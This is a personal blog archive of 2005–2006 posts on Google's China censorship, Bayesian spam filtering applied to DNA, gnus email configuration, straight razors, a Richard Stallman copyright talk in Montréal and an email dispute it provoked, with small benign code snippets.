I was expecting a counterexample when Google went public. That was wishful thinking. Google started to censor search results in China. This is no minor evil, and it's really bad for Google. Google was better because we could trust it. When a search result comes up in a second-rate search engine, we never know if it's there because it's a good result or because someone paid to put it there. Now, with Google, it's the other way around. When a result comes up, is it because it's good or because someone paid to filter out the real hits?

Now that Google is publicly traded, it has a new metric, and if we don't like what Google does, we have to say it using that metric. How? The first thing I did was to cancel my Google account (Google account -> preferences -> account -> delete account). But unfortunately you can't tell them why you did it in that form, so you must also use the feedback form to let them know. Yeah, it's going to be hard to avoid Google search, but at least if we cancel enough accounts, delete enough Google cookies and avoid the other Google services enough, we can make a visible shift in the share value metric. So far so good, the publicly traded company conjecture still holds.

2006-01-16 Marking DNA as spam

The idea behind bioinformatics, at least for some people, is that since the information encoded in DNA is sequential, you can parse it more or less the same way you parse an English text. You can apply a regex to DNA and you can search DNA just as you can search text. But how far can you push it?

The part of information processing science formerly known as AI developed a whole range of "machine learning" techniques. Most never made it into the real world, but once in a while a new idea is ripe and you see it spread like a storm. Most techniques that tried to model how the brain works are miserable failures, but it happens that someone understands how people use information, applies some really simple patterns, and turns worthless data into the most valuable repository of knowledge.

If you were to look for "Bayesian classification" in a stats textbook, you would probably find nothing, except maybe that it's a method you should avoid. Naive Bayesian classification is a way to combine independent pieces of evidence about some event to refine your knowledge about it. The catch is right there: "independent" in probabilities is what they call a "strong assumption", and you almost never see truly independent evidence except for trivial stuff.

When Paul Graham solved the problem of spam, he did something that would drive any stats teacher crazy: he said that the words in an email are independent. Why did he do that? If you do that, you can use a really simple formula; if you don't, the computation is so hard that no computer can undertake it for a 300-word email. While statisticians are still screaming, Bayesian filters are filtering the world's spam and they work better than anything else.
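
To give an idea of how simple the formula gets under the independence assumption, here is a sketch in Python along the lines of Graham's "A Plan for Spam" (my own simplification, not his exact scheme):

   def combine(probs):
       # probs: for each word of the email, the probability that a
       # message containing that word is spam; assuming the words are
       # independent, the whole email is spam with probability
       #     prod(p) / (prod(p) + prod(1 - p))
       p_spam, p_ham = 1.0, 1.0
       for p in probs:
           p_spam *= p
           p_ham *= 1.0 - p
       return p_spam / (p_spam + p_ham)

With word probabilities like [0.99, 0.9, 0.2] this gives about 0.996: a couple of very spammy words dominate the verdict.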

How about DNA? The original question was: "given the few proteins that we know to be localized in the nucleolus, can we find a pattern that will help us find others?" If someone asks you that, the first logical reaction should be to grab something to drink. Now that you've taken care of that, you can say that you don't know and that you'd prefer to work on something as boring as applying design patterns to bioinformatics, you can decide to apply some techniques that should theoretically work, or you can decide to dive in and try what works in the real world, even though it shouldn't.

What we did is shocking: we didn't implement a Bayesian classifier for DNA, we used the excellent spamoracle and fed it the sequences as if they were emails (roughly as sketched below). I kind of hope that my stats teacher won't read this far, but what is even more shocking is that it works, to some extent.
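
I won't reproduce our actual pipeline here, but the trick of making a sequence digestible by a text classifier can be sketched like this (a toy version; the word size and the message format are arbitrary choices of mine):

   def sequence_to_words(seq, k=6):
       # chop a sequence into overlapping k-letter "words" so that a
       # text classifier has tokens to count
       seq = seq.upper().replace("\n", "")
       return [seq[i:i + k] for i in range(len(seq) - k + 1)]

   def as_fake_email(name, seq):
       # wrap the words into something that looks enough like an email
       return "Subject: %s\n\n%s\n" % (name, " ".join(sequence_to_words(seq)))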

We don't find all the nucleolar proteins, but we find a lot of them with really few false positives. Furthermore, spamoracle has really nice regex queries on the training set. That way we can explore what kinds of "words" lead to correct classifications. And that's the interesting part, because you can't do that with neural nets and other machine learning techniques. And what we find fits pretty well with what people find in wet labs. Now, a word of warning is needed. BLAST does not work like Google, and there is a reason for that: you typically search for a few exact words on Google, while you typically do a fuzzy search on a really long DNA word with BLAST. Before you can replace all your wet lab staff with monkeys punching sequences into a Bayesian filter, a lot of work must be done on building better training sets and on biologically relevant ways to search for a word in correlation tables.

2005-10-29 Night sky

When you live in a large enough city, watching the stars is a rare delicacy that you can't often afford. This semester I took a course on astronomy and it reminded me how much I missed watching the stars. You can live in the city and completely forget that there are stars beyond that gray dome, but when you learn about cosmology, about why nebulae glow, about the life cycle of stars, about dying red giants like Aldebaran, the lack of a night sky becomes unbearable.

So I listened to my heart and I bought a telescope. A really nice and short 90mm Maksutov-Cassegrain with an equatorial mount. It is a bit heavy for the aperture, but the size is a perfect fit for a motorcycle backpack. Of course, as soon as I bought it there was a streak of never-ending clouds. At last, after a week, I was able to take it out for its first light. Now, when you have a scope on its tripod and its mount aligned and ready to watch, where do you point it? I had my planisphere in hand, but all those NGC numbers don't tell much about how interesting an object is and whether you can expect to see it with a 90mm scope.

Since I can't spend all my nights looking at M42, I did my homework and found the deep sky objects that can be observed with a small scope and that are well positioned at this time of the year. There is no point in keeping this information to myself, so I offer this late fall watch plan to my fellow amateur astronomers who live around 45° north latitude.

2005-10-15 Death of a storyline

A long time ago, during my first job as a coder, I was introduced to the geek lifestyle. Being a geek is different from being a nerd, though most nerds have really good unexploited geek potential. Being a geek is to be proud of your nerdiness, to the point where you expose it defiantly to the world. Geeks wear t-shirts with cryptic code snippets and talk with each other in an obscure jargon. Geeks don't enjoy their morning coffee while reading the newspaper; they do so while reading Slashdot, User Friendly and many other geek-oriented comic strips.

One such strip, Megatokyo, was really influential in the development of my early geek persona. To truly understand what I mean you have to look at the early strips of Megatokyo. The characters in User Friendly are professional geeks, the ones working in tech-related jobs, but the ones in Megatokyo were the college computer nerd type. Now that's something someone who just graduated can really identify with.

Megatokyo was co-created by two people, an über geek and a manga-style artist. That combination was perfect: you had excellent geek cliché stories illustrated in a talented, artful manner. Unfortunately, this wonderful collaboration ended in a clash. Sometime in 2002, Rodney Caston (the geek) left Megatokyo and Fred Gallagher (the illustrator) went on to run Megatokyo all by himself. What happened was subtle at the time and, since there was no noticeable change in the drawing style, you might have thought that everything was going fine. Until one day you wake up and say "WTF, how many boring strips in a row did I swallow?".

Now that you know when to look, you can go ahead and see for yourself. The story got filled with love stories and slow-moving plots, Largo was turned into some evil character, and the geek elements were removed, one by one. You would have a hard time finding a real game reference in the last year of strips. Even the l33t feels wrong nowadays. Fred Gallagher is a talented artist; he doesn't have to be omnipotent as long as he gets in touch with people who can fill in the blanks. For that reason, I think that it is time to act. The Megatokyo fan base will walk away if we wait too long and that great comic strip will fall into irrelevance. You can save Megatokyo: write to Fred Gallagher and ask for the return of Rodney Caston.

2005-08-21 Email Clients

If someone typed something like date +"%Y" at his terminal, assuming he used the Gregorian calendar, he would probably see something like 2005. If the same person were to read RFC 196, he would probably see July 20, 1971 near the beginning. Only 13 years after the discovery of the Bessemer process we had the first transcontinental railroad; after more than 30 years of email, all email clients suck.

Anyone who uses email for something other than remote backups knows what I'm talking about. If you need to read your emails from more than one location, you can probably forget all the nice "native" clients. But webmail requires heavy use of the mouse and lacks many important features, like a usable spell-checker and incremental search. All the webmail service providers have EULAs that require your firstborn and a pint of fresh blood a month. Namespace pollution is another problem: I don't want my email to be y._kk_gingras234252_asd@example.com, I want ygingras@ygingras.net. So-called native clients have pretty UIs, but when some important feature is needed, it seems they don't want to mess too much with that UI, so the feature gets postponed. Spam is a plague, but a great thinker found a solution a few years ago already.

The solution (for the UI part) is dead simple: add a "mark as spam" button. There are tons of great Bayesian filters out there. They all perform pretty well since the math is so simple. I use spamoracle because it has an easy-to-tune engine and tri-state classification, and it is pretty fast. The only problem is that it needs to be fed a mail corpus, which most email clients make hard to build. Keeping in mind that I want to access my mails from several places and that all webmails suck badly, I turned to gnus. Before anyone even thinks of using gnus, he should be warned that gnus is ugly. Well, we can even say that it is really disgustingly disfigured. This client is excessively configurable; the manual features a 10-page chapter on starting gnus. Nevertheless, this is the most usable client I can find. The first thing is that we configure it with either Emacs's customize mode or with Lisp expressions. Emacs's built-in regexp engine and visual regexp editing will replace 200 click-made filters with a pretty expression in no time:

  (setq nnmail-split-fancy 
      '(| (to "sbcl-devel@" "sbcl-devel")
	  (to "gnu-arch-users@gnu\\.org" "Arch")
	  (to "mslug@iro\\.umontreal\\.ca" "MSLUG")
	  ("Subject" "Bacula: Backup" "bacula")
	  (to "\\b\\([A-Za-z0-9\\-]+\\)-list@lists\\.alioth" 
	      "alioth.\\1")
	  (to "\\b\\([A-Za-z0-9\\-]+\\)@securityfocus\\.com" "sec.\\1")
	  (: spam-split)
	  "inbox"))

One nice feature here is the dynamic creation of folder (group, in gnus parlance) names. Messages are presented threaded, with the bonus that you can re-thread a message if, for example, someone is using a broken client that doesn't know about threading yet. Filtering is excellent: we can filter for a time slice, but once we have the interesting messages we can include the whole parent threads. Now let's talk about spam. Gnus has good spam integration. It will gladly put what your filter says is spam in a spam folder and let the rest flow into your inbox. Did I just talk about tri-state classification? The bad news is that I wasn't able to find a tri-state option for the integration with spamoracle. The good news is that I was able to implement it in 5 minutes by replacing

  (when (re-search-forward "^X-Spam: yes;" nil t)
    spam-split-group)

by

  (cond ((re-search-forward "^X-Spam: yes;" nil t)
         "obvious")
        ((re-search-forward "^X-Spam: no;" nil t)
         nil)
        (t "suspicious"))

in spam-check-spamoracle. Now we can tell gnus that obvious and suspicious are spam folders. When we do that, gnus automatically marks all the messages as spam when we enter those folders. When we quit a folder, the messages for which we removed the spam mark are moved to our inbox; the other ones go to the spam folder, aka the filter's training ground. When a spam falls into our inbox by mistake, the shortcut M-d will mark it as spam. That way our spam corpus is not corrupted even if we get false positives (i.e. a good email marked as spam), and we can retrain the filter as soon as we hit a false negative (i.e. a spam in our inbox), even if we don't feel like checking for false positives at the moment. Using tri-state classification, we maximize our time: the obvious folder can be scanned really fast and not too often, while the suspicious one is where we look for borderline messages that might require instant retraining of the filter. We can also keep a hard-ham and a hard-spam folder for emails that get the wrong classification and retrain the filter twice with those.

This is not to say that gnus is a good email client. I hate it and I still think that all email clients suck. It is only a bit better and a lot more customizable than the others. Did I mention that it can be set to use an English spell-checker when I send emails to sbcl-devel and a French one when I write to my mother? By the way, I don't write that often to my mother since she can't stand how much all email clients suck.

2005-08-05 Straight razor

Fur is a great boon that evolution gave to mammals. Fur allows the heat conservation required to be efficiently hot-blooded and to survive in the coldest weather on this planet. For some strange reason, the fur of humans is rather sparse. This led to an unconscious association between the lack of fur and the superiority of a life form.

As soon as metallurgy allowed decent blades, humans started to alter their fur to look as little as possible like an inferior mammal. Shaving of facial hair was already popular among the ancient Greeks. Today we have advanced metalworking technology and shaving is a daily routine for many. Nevertheless, it seems impossible to make long-lasting razor blades. There is a lot of buzz about the technical innovations in new shaving technology and how smooth and how close a shave can get. We sometimes even hear that a new type of blade might last a bit longer.

The sad reality is that the money spent on razor blades is constant, if not increasing. Those new blades feature patented technology, which prevents cheap alternatives, and they are sold at the price of a lunch each. To motivate us to try those new and improved blades, they even inflate the price of the old types of blades. The net effect is that we keep using the same blade as long as possible, with disastrous consequences for our poor skin.

Why can't we come up with some kind of blade that will stay sharp for more than a dozen shaves? The sad reality is that the razor blade industry is a racket capitalizing on our fear. We've had the technology for blades capable of staying sharp for someone's whole life for the last few hundred years. You hear in every ad that the new overpriced disposable blades will prevent you from cutting yourself. By selling overpriced blades, Gillette managed to make more profit in 2005 than Coca-Cola.

I got tired of the disposable blade scam, so I looked for alternatives. During the Renaissance and the industrial revolution we acquired a good mastery of steelwork and of metal polishing. The straight razor evolved into the high-carbon alloy, biconcave blade that it has kept for the last few centuries. This particular configuration makes a blade with an extremely sharp edge that is easy to sharpen, with enough rigidity for the safe manipulation of this deadly instrument.

After many years of the disposable blade racket, it is hard to find a long-lasting razor. Most stores that carry them sell them as expensive curiosities or fine antique artifacts of a long-lost past. Even though the math is simple and a 200$ razor will repay itself, it is a big initial investment for something you've never tried and that you might end up discarding as too dangerous, as they all tell you it must be. After a lot of shopping I found a used straight razor and a hone for 40$. I searched for good tutorials and I made a strop with an old leather belt.

After a few days using said instrument, I must say that I really like it. My first shave was not that close, but with some variations on the stropping and the angle of the blade I'm getting results as good as with the disposable crap. The blade is really large and you can cover a lot of skin with a single sweeping motion. Unlike with the safety razor, you don't have to go over the same area many times: you make a single, long, continuous pass, then maybe another one at a different angle. My face is still free of cuts. I have a few cuts on the back of my head; I admit that this tool is hard to use on the areas that you don't see directly in a mirror. People I've talked to tell me that I'll get a much closer shave with a straight razor. Don't let the disposable blade makers scare you: if people willingly shaved daily when the only razor available was a straight razor, this baby can't be that hard to use. A straight razor will stay sharp and it won't scrub your face like a battlefield. Forget about this disposable nonsense and get a high-tech blade that will stay sharp for a lifetime.

2005-08-03 Huge nuke in the sky

Our Sun, as you probably know, is a huge ball of plasma surrounding a massive thermonuclear chain reaction. The mass of the whole thing prevents the inner nuke blast from sending most of the "stuff" flying around. The "stuff" is kept there by the gravitational field of the Sun, but the insane amount of energy released by the inner core also keeps the outer plasma in constant convection, a bit like how a stove can bring water to a steady boil. Once in a while, a big bubble comes to the surface and launches a big chunk of matter into space. Scientists like to give funny names to huge bubbles of plasma, so they call the phenomenon a coronal mass ejection.

Just as if the idea of a giant nuke bringing a colossal amount of plasma to a violent boil and sending matter into space wasn't fascinating enough, SOHO is filming the whole thing for our viewing pleasure. The last week offered a few really brutal coronal mass ejections and SOHO features a breathtaking movie of them. Keep in mind that the Sun is only the tiny white circle in the middle of the video. Earth is nothing compared to those ferocious solar events. Such a display of pure power has to fill us with humility. The active region is expected to face us at about the same time as the peak of the Perseid meteor shower, which would give us quite a night show and hopefully more of those excellent solar flare movies.

2005-07-29 Lisp porno movies

In one of the chapters of The Mythical Man-Month you see the menu of a restaurant with the caption "Faire de la bonne cuisine demande un certain temps. Si on vous fait attendre, c'est pour mieux vous servir, et vous plaire", which translates to "Good cooking takes time. If you are made to wait, it is to serve you better, and to please you". It is true that a quick snack can help you wait, and I hope that my fractal zooming movies helped you wait. Now, the real meal is ready. David Steuber finished rendering his Xeno's Xomo movie! This movie is made with Common Lisp; it took months to render. It is a complete movie, with a soundtrack and all.

I hope that this kind of movie stimulates your curiosity about Common Lisp. You are lucky to start now: Marco Baringer just made a great demo of SLIME, the Common Lisp interaction mode for Emacs. In this demo you'll learn some of the tricks that make editing Lisp such a pleasure. After that you'll probably want to code your own web-based fractal zoomer, so why not grab Marco's demo of UCW, a package for developing web applications in Common Lisp. We are not done yet! You think that Common Lisp is the perfect language already? You are wrong, but the good news is that making the perfect language for a particular job is pretty easy if you use Common Lisp. Rainer Joswig made a really good demo of a domain-specific language using Common Lisp.

Now you must have started your downloads, and while you are waiting you think that you should do some googling for a good Lisp tutorial. You can stop searching: Peter Seibel was kind enough to put Practical Common Lisp online for your reading pleasure. "Are we done yet?" you might wonder. Well... no, I'm afraid there is still more porn to download. Rainer Joswig managed to find some Symbolics Lisp Machines and made some Lisp machine videos! That should be enough for now, I'll keep the rest for dessert.

2005-07-25 Censorship

Sometimes we hear about censorship and we are glad to live in a country where we can express ourselves. I'm always glad to live in an area that provides so many opportunities to shout as loud as the big media. Now we have the net and we can build websites with very few resources and little skill to spread our thoughts.

But it also happens that some people don't want you to express yourself, and they can be very determined to silence you. I was under the impression that I had made a pretty good recap of Stallman's presentation until a strange email appeared in my inbox:

Hello,
I don't know if you are a francophone and I don't speak English very
well.
I would like to meet you in person about the copyright day to which
Richard Stalmann was invited: I think there is some crucial
information you seem to be missing about the volunteer-run and rapid
organization of setting up a day like this one.  Also, you made
gratuitous and hurtful remarks on your blog about the presence of
volunteer participants, which in my eyes are unacceptable.

That could have been just a misunderstanding, so I replied peacefully:

On July 25, 2005 11:45 am, you wrote:
> I don't know if you are a francophone and I don't speak English very well.

I am a francophone.

> I would like to meet you in person about the copyright day to which
> Richard Stalmann was invited: I think there is some crucial
> information you seem to be missing about the volunteer-run and rapid
> organization of setting up a day like this one.

With pleasure.  Where and when?

> Also, you made gratuitous and hurtful remarks on your blog about the
> presence of volunteer participants, which in my eyes are
> unacceptable.

Is this about the article dated 2005-07-05 on ygingras.net?  I just
reread it and it appears to me free of any defamatory statement.  It
is true that there are writings I wish I had never published, but
this one is not vitriolic at all.  Where exactly are the "gratuitous
and hurtful remarks"?  I wrote this article to thank Richard Stallman
and the organizers of the event, so such accusations leave me
somewhat perplexed.  It is true that I don't have a photographic
memory and it is possible that my summary is not entirely accurate.
My apologies if my failing mnemonic faculties hurt anyone.

But it was a mistake; I should have claimed that my spam filter ate the email. I unleashed a frenzy in my correspondent, who quickly accused me of vile propaganda and gave a completely new and distorted meaning to my words:

hi,
> I am a francophone.
>
Sorry, I only saw afterwards that you were a francophone :-)

>> I would like to meet you in person about the copyright day to which
>> Richard Stalmann was invited: I think there is some crucial
>> information you seem to be missing about the volunteer-run and
>> rapid organization of setting up a day like this one.
>
> With pleasure.  Where and when?
>
Well, let's say sometime this week; I will contact you again, I am
quite busy but I would like us to meet.  At café Utopik, 552 St
Catherine East.  From the Berri-UQAM (metro) station it's 2 minutes,
St Catherine exit, 30m.

>> Also, you made gratuitous and hurtful remarks on your blog about
>> the presence of volunteer participants, which in my eyes are
>> unacceptable.
>
>
> Is this about the article dated 2005-07-05 on ygingras.net?  I just
> reread it and it appears to me free of any defamatory statement.  It
> is true that there are writings I wish I had never published, but
> this one is not vitriolic at all.  Where exactly are the "gratuitous
> and hurtful remarks"?  I wrote this article to thank Richard
> Stallman and the organizers of the event, so such accusations leave
> me somewhat perplexed.  It is true that I don't have a photographic
> memory and it is possible that my summary is not entirely accurate.
> My apologies if my failing mnemonic faculties hurt anyone.

A person from our association who took part in organizing the event
felt hurt by what you wrote on your blog, and so did I:

 >> >  You could even see hippies advocating the benefits of homegrown
 >> > berries  and comic writers debating about the proper inking
 >> > techniques. »

You are obviously free to write what you want, and the "hippies" bit
is almost funny, but where it gets hurtful is that we work in the
responsible economy.  This day was organized by volunteers only.  And
there you are "criticizing" positive, free initiatives done for the
good of all: "You could even see hippies advocating the benefits of
homegrown berries and comic writers debating about the proper inking
techniques. »
If you must criticize someone or something, criticize the system, but
not us!!!!!

Me, I come from France, I am in Montréal and I have already lived a
few years here.  And every day I am shocked to see North American
culture bathed in a single way of thinking.  It is very sad.

The stand that offered fruit was free, the conference was free and
done with whatever means were at hand.  The stand that you described
as "comic writers debating about the proper inking techniques"
represents a collective of volunteers doing legal, technical and
political watch.

It's as if you were criticizing the consumer protection bureau!!!
You see what I mean? :-)

You also write: "Strangely, most of them were not from hardcore geek
groups."

I know that you are young and that the stakes of Free Software range
from the technical to the legal and the political.  And that it is
hard to grasp it all.
But if you thought you would find a gang of geeks ready to praise
Stallman, too bad for you.  Free software people are people who are
involved day after day and there is nothing funny in that.  We are
just happy to get together :-)
Moreover, we were not at all panicking about not seeing Stallman
arrive on time (something you wrote).  Know that our collective had
been hosting him at home for several days.  We just wanted the
schedule to be respected because of the room rental and the guests.
Find out some day how much it costs to bring in Richard Stallman, and
sit down ;-).  It is a little gift that we gave you.  Usually he is
expensive to bring in and admission is charged.

"Strangely, most of them were not from hardcore geek groups."  I
organized a conference last Sunday on women and free software.  This
is to tell you that free software is not the prerogative of men and
geeks.  That is what caused the fall of the old association in
Quebec!
During that day of talks, we did not speak of cyberfeminism but of
ways to support free software in education, the public sector, cafés
and libraries.  We showed that women are very active in responsible
local development around the world and on every continent, and they
use free software, and they are close to the FSF's discourse.  We
don't stop at the OSI discourse; we build, we move forward.
http://www.######.###/article####.html

See you soon ;-)

You can guess that I find this last wink a bit scary. Somehow it seems that my description of the event has been turned into a form of negative commentary by some out-of-context quotations in triple email forwarding. The most obvious distortion is the reference to the comic writers. Supposedly I criticized some volunteer legal watchdogs by calling them "comic writers". You can see from this website that in the original article "comic writers" is a link to the work of Frédéric Guimont, who was at the event and with whom I personally discussed inking techniques.

I really don't know what to think about this message. It is hard to believe that my original article could suffer so much distortion that it can spawn such a fiery reaction. Maybe some vigilantes want to turn my writing to their bidding. Perhaps they only want to hone their intimidation process on a harmless pal like me. I must admit that I'm a bit scared, but not enough to stop writing. To all my fellow bloggers: don't give up the fight, they can't silence all of us!

2005-07-05 Richard Stallman at UQAM

We had the pleasure of hearing a talk on copyright by Richard Stallman of the Free Software Foundation. The event was organized by many volunteers. Strangely, most of them were not from hardcore geek groups. You could even see hippies advocating the benefits of homegrown berries and comic writers debating about the proper inking techniques.

The first part of the event featured various kiosks by several organizations active in the Montréal area. There was my former employer, several GNU/Linux user groups and a few free speech activists. There were not many visitors. Given the lack of prior notification that was understandable, but still disappointing. Nevertheless, it was fun to see former coworkers again. I finally had the occasion to brag about my new π memorization skills. At university, I'm affiliated with the LaCIM, the lab Simon Plouffe was affiliated with when he came up with his formula for the computation of the digits of π. Simon Plouffe is also a former world record holder for remembering digits of π, so I don't impress anyone there.

The second part was something else. The large auditorium was filled to capacity, I would say over 300 attendees. You could see GNU and penguin shirts everywhere. You could also see a lot of older people and even a few suits. There was a little delay, as expected with any presentation, and a bit of panic. What I understand is that the organizers had lost track of Richard Stallman. Then he entered the room, radiating his strong charisma. You can read about that in Free as in Freedom, but to see it in reality is something. Everyone stopped talking and every eye was locked on him.

He started his presentation with a small history of Free Software, the fundamental rights and why software is different from chairs and other physical objects. He spoke really good French. Some people live in Montréal all their life and never manage to speak French that well. He only inquired a few times about the proper terms to use. This is written in many places, but RMS started the GNU project when he saw the world of software starting to take fundamental rights away from the users: the right to use the software however you like; the right to study it, its internals and how it works, and to modify it; the right to help your neighbors by redistributing the software; and the right to redistribute a modified version of the software.

Software is different because you can share it without losing it. Software is different because you can hide how it works. The version of the software that you use is the version that only the computer can understand. To see how the software works and to adapt it to your needs, you need its source code. If a toaster doesn't please you, you can take a screwdriver and take it apart; you don't need the blueprints to do so. But the talk was not about Free Software, so RMS proceeded with copyright.

In antiquity and in the middle ages, the skill required to use a book was the same skill required to reproduce it. The reader of a book could reproduce it just as easily as the original author, and reproducing 100 books took 100 times as long as reproducing a single book. If you wanted Euclid's Elements and you were not living in Alexandria, you had no hope of finding Euclid and asking him for a copy of his book. You had to find someone who had it and either borrow the book from him to make your own copy or convince him to make a copy for you. Euclid had not much to gain by knocking at every door to find out if you had copied his book; he probably had something better to do than making all the copies himself. Books were still written, authors had a motivation: sharing knowledge and stories is part of human nature. We have done it for thousands of years.

Things started to change with the printing press. With the printing press, you had an enormous price to acquire the equipment and a long setup to typeset a book, but once your plates were ready, you could print as many copies as you liked in a relatively short time. Nevertheless, not all kinds of works benefited dramatically from the printing press: you need to print enough copies to account for the time spent typesetting the plates. So a print-shop could decide to print a book and the author would get nothing while the print-shop would sell hundreds of copies. This is not theft; the print-shop does not prevent the author from continuing to sell his own hand-made copies or from opening his own print-shop.

Some prestigious authors managed to influence rulers into granting them a monopoly on the reproduction of their own work, but it was on a case-by-case basis at that time. Around the 18th century, we started to see official copyright laws. That way, it was thought, by restricting the rights of the public for a limited time, authors would get more motivation to write more books, for the greater good of all. Manual copying was still going on for niche market works and for really poor people. Manual copying was not targeted: these laws were meant to prevent abuse by print-shops. A manual copyist cannot abuse much, and the laws were easy to apply since print-shops had to advertise what they were planning to sell.

The public was giving away a fundamental right, the right to share and to communicate its knowledge, but it wasn't giving up much: only the right to share with a printing press that most people didn't have. But technology kept progressing. Now most people own devices capable of better reproduction than a printing press; now the public has something to lose. During the era of the printing press, power shifted relatively fast from the authors to the editors. The author had an exclusive monopoly on his work, but there were many authors and not that many print shops. The print shops would not agree to print your book and pay you royalties if you were going to bypass them by also dealing with other print shops.

The situation we have now is that the editors always require the author to assign them the exclusive copyright. The law that was supposed to limit the power of the editors and protect the authors made the editors more powerful. The ones lobbying for revisions to the copyright laws are the editors, not the authors. They have a strong propaganda machine and they claim they do it for the starving authors. The reality is that the editors keep the authors starving.

To get a record contract, a band must assign its copyright to the record company. The record company will negotiate a royalty rate of around 4% of the retail price. The record company considers that recording, mastering and producing the record is an advance on the royalties. Most bands won't sell enough records to get past this advance, and they won't receive a single penny from disc sales. Why do bands still sign record contracts? Because of payola. Record companies are "well plugged" with radio stations; many were sentenced for using illegal means to convince radio stations to play selected records. Bands sign record contracts to get the promotion they need to fill their shows, where they make the real money. Even if a band would like to let you download its songs, the copyright is not theirs anymore: the record company decides what you can do with the music.

We have reached a technological point where we don't need the record companies anymore. If you like a band, share its music as much as you can to promote them, and send them one dollar, you have sent them more money than they would have gotten if you had bought a record from a store. Given the technological context, giving exclusive reproduction rights to the editors is not the good deal it was in the days of the printing press. The author gets screwed because he doesn't get as much as he deserves, and the public gets screwed because it loses a right it now has the means to exercise, a right that would bring the public more happiness without taking anything away from the author.

The editors are right on at least one point: we need to revise the copyright laws. But not to give them more rights; we need to take back ours. The government should not serve to protect the business model of obsolete middlemen, it should serve its people. What Richard Stallman proposes is short term copyright. He thinks ten years should be enough for an editor to cover the setup costs of typesetting and printing books, the research behind reference manuals and the studio time of records. Indeed, most works are out of print long before that ten year term expires. Editors don't care to keep a publication available, but they still want to prevent you from getting it from an individual who already has it. RMS admitted that he had heard some protests from authors: a prized author once told him that ten years was way too much and that five years was as long as a work should be covered by copyright. Editors claim they need 90 years to fully recover their investment. The reality is that they want to prevent you from using public domain works, works they keep unavailable so they can sell you something else.

Richard Stallman also realizes that not every piece of human work should be shared the same way. Every published work falls more or less into one of three categories: utility and reference works, like computer programs and dictionaries; works expressing someone's ideas, like essays; and entertainment. In all cases, private non-commercial verbatim copies should be allowed. A non-commercial copy takes nothing away from the author, and preventing it would require a police state that breaks down doors to perform full cavity searches, or at least one that seizes your computer or installs government sponsored spyware.

It should be possible to modify and redistribute utility and reference works, maybe after a short delay. That may require the government to step in and ensure that the source code of programs is made available to the public. It makes sense to allow only verbatim copies of works expressing someone's ideas, like essays. On the other hand, after a delay it should be possible to build new work on someone else's entertainment work. This form of folklore is dominant among the masterpieces of the past. Think of The Lord of the Rings, which is more or less a modern retelling of Der Ring des Nibelungen, itself a Germanic retelling of the traditional Norse legend of Sigurd the Dragon Slayer.

Richard Stallman invites us to make a lot of noise. We can blog about copyright and organize meetings for ultra geeks, but that's not how we will reach the public. If we don't have the public, the government can afford not to listen to us. We must take to the streets, possibly picketing in front of record stores.

There was a panel with invited speakers after the talk, but we needed to clear the room by 22h so there were not many interesting questions. There was a bit of flaming among the speakers, quite sad. RMS reminded us that we often forget to give credit to all the GNU hackers when we refer to the GNU/Linux operating system as "Linux". He also pointed out that we are a bit victims of the propaganda from companies like IBM who prefer to talk about the quality of "open source software" instead of the freedoms protected by Free Software. Thanks again to Richard Stallman and to all the organizers! If you were shaken by the ideas in this speech, don't forget to become a member of the FSF so I get my free voice mail message. ; )

2005-07-03 π

When you read that the human brain can recall 83431 digits of π, you ask yourself many questions. What is the process of learning all those digits? How can you recall where you are after 10 hours of recitation? How do you "see" the number in your head?

The discussion on /. gave a few tricks for memorizing digits and I decided to try it myself. I made a really simple trainer that groups the digits into blocks of 10 and color codes them. I already feel some improvement with the color coding: I can recall the block transitions and it helps me "know where I am".
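
If you are curious, the gist of the trainer fits in a few lines. A minimal sketch, assuming the digits come as a plain string and that we just cycle through a fixed palette, one color per block of 10 (the names and the palette are mine for illustration, not the trainer's actual code):

      ;; Split DIGITS into blocks of 10 and cycle through a fixed
      ;; palette, so a given block keeps the same color every session.
      (defparameter *palette* '("red" "green" "blue" "orange"))

      (defun color-blocks (digits &key (block-size 10))
        (loop for start from 0 below (length digits) by block-size
              for i from 0
              collect (list (nth (mod i (length *palette*)) *palette*)
                            (subseq digits start
                                    (min (length digits)
                                         (+ start block-size))))))

      ;; (color-blocks "14159265358979323846")
      ;; => (("red" "1415926535") ("green" "8979323846"))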

2005-06-25 Fireworks

The weather was really painful today in Montréal. Humidity was over 85% and the temperature climbed to 32 degrees Celsius. Needless to say, there was visible smog. I was hiding from the weather in the comfort of UQAM's AC when I saw the t-15 fireball announcing the imminent start of the fireworks. It was a big green ball over the bridge; the air was so heavy that there was a big halo all around it. The sky had faded back to black before the bang could reach my observatory. I was disappointed that I had forgotten about the show, but a quick look at my watch confirmed that I could still make it, so I dared to sprint on my bike across the Saturday night traffic in the damp weather.

The weather was painful but it was perfect for such a show. I arrived just in time, dripping sweat like a marathon runner. Tonight's fireworks were particularly great. The high humidity carried all the sounds with a strong echo and the smog flared into an eerie aura with every flash. Tonight's contestant was France. They did In the Hall of the Mountain King. You could feel the climax coming with great low altitude ground work. There were spiraling, straight-traveling rockets, alternating colors and climbing higher and higher each time. Then the fireballs: many simultaneous big, bright fireballs with the loud echo of the bangs. Some people even started to leave, thinking such a climax could only be the finale.

Fortunately it was not. Soon came Temple of Love, the (1992?) version with the female singer. There were solitary, small, really bright flashes. Alone, that part could have been boring, but it followed the music nicely until the lyrics came to "fire from the fireworks up above me" and the sky filled with heart shaped fireballs for a few minutes. The show went on with mini climaxes, and no particular kind of rocket was overused. Every song had a dominant type of fireball and groundwork. The finale was jaw dropping. The width of the St-Laurent was covered with simultaneous explosions. You always see a few really large ones in the finale, but this time it was more than that: a non-stop bang of multiple smaller fireballs while the bigger ones were still expanding. I'm happy to have braved the weather, it was well worth it.

2005-06-21 Blown up video card

Since I decided to use XMMS as my alarm clock, I've put a lot of pressure on the stability of my workstation. No big problems there since I'm running Debian GNU/Linux, though some features are missing from the XMMS alarm plug-in, like snooze and stuff like that. But back to the story: I was in my bed, fully awake, with the sun flowing in from behind my curtains.

No possible doubt: my trusty system did not wake me up. What a shame; it was not a power failure or a bad setting on my part, it had crashed. It went back up without problems, only to crash a few hours later with big ugly vertical stripes on the monitor. When I rebooted, the stripes were still there at the BIOS prompt. Easy diagnosis: dead video card. My system is back on track with a crappy PCI card from the emergency spare parts bin.

Judging by the smell of the card, it is roasted. Even spare fans would not have saved it. Why is that? Why can't a 400$ card come with a decent ball bearing fan? The fan on my 200MHz box is still running, even with all the lint tightly packed in the heat sink. I have six year old 5$ case fans still running. When the heat sink on the CPU got clogged with lint, the system crashed but the core did not melt. That's my second roasted video card with that six year old system.

